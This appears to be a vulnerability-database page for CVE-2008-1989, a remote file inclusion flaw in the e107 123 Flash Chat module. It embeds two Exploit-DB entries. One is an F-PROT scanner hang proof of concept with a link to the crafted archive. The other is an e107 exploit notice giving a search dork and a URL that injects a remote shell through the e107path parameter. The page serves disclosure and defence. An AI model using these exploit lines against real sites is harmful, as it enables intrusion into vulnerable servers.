CVE-2008-1989
published 2008-04-27CVE-2008-1989: PHP remote file inclusion vulnerability in 123flashchat.php in the 123 Flash Chat 6.8.0 module for e107, when register_globals is enabled, allows remote…
PriorityP347critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
3.57%
87.9th percentile
PHP remote file inclusion vulnerability in 123flashchat.php in the 123 Flash Chat 6.8.0 module for e107, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the e107path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 123flashchat | 123_flash_chat_module | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
F-PROT AntiVirus 6.2.1.4252 - Malformed Archive Infinite Loop Denial of Service
exploitdb·2008-07-31
CVE-2008-3447 F-PROT AntiVirus 6.2.1.4252 - Malformed Archive Infinite Loop Denial of Service
F-PROT AntiVirus 6.2.1.4252 - Malformed Archive Infinite Loop Denial of Service
---
$ /opt/f-prot/fpscan snot.zip
F-PROT Antivirus version 6.2.1.4252 (built: 2008-04-28T16-44-10)
FRISK Software International (C) Copyright 1989-2007
Engine version: 4.4.4.56
Virus signatures: 200806021748d9e53873896ea96bd4e8a470344c25b5
(/opt/f-prot/antivir.def)
Scanning: -
^^ at this point the scanner gets stuck in an infinite loop and will not
finish or continue to other files if told to scan a directory.
If you use F-PROT you probably won't be reading this on account of
your scanner hanging, woops.
--
kokanin
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6174.zip (2008-snot.zip.bla)
# milw0rm.com [2008-07-31]
Exploit-DB
e107 module 123 flash chat 6.8.0 - Remote File Inclusion
exploitdb·2008-04-17
CVE-2008-1989 e107 module 123 flash chat 6.8.0 - Remote File Inclusion
e107 module 123 flash chat 6.8.0 - Remote File Inclusion
---
###############################################################
#
# E107 Chat Module 123FlashChat Remote File Inclusion Vulnerability
#
#########################################################
#
# AUTHOR : by_casper41
#
# Mekan : Cyber-Warrior.Org
#
# MAİL : [email protected]
#
##########################################################
#
# Download: http://www.123flashchat.com/download/e107_mod_for_123flashchat_6.8.0.zip
#
##########################################################
# DORKS : "123flashchat.php"
##########################################################
#
# EXPLOITS :
# Http://localhost/path/123flashchat.php?e107path=Sh3LL
#
################################################################
# milw0rm.com [2008
No writeups or analysis indexed.
http://secunia.com/advisories/29870http://www.securityfocus.com/bid/28828https://exchange.xforce.ibmcloud.com/vulnerabilities/41867https://www.exploit-db.com/exploits/5459http://secunia.com/advisories/29870http://www.securityfocus.com/bid/28828https://exchange.xforce.ibmcloud.com/vulnerabilities/41867https://www.exploit-db.com/exploits/5459
2008-04-27
Published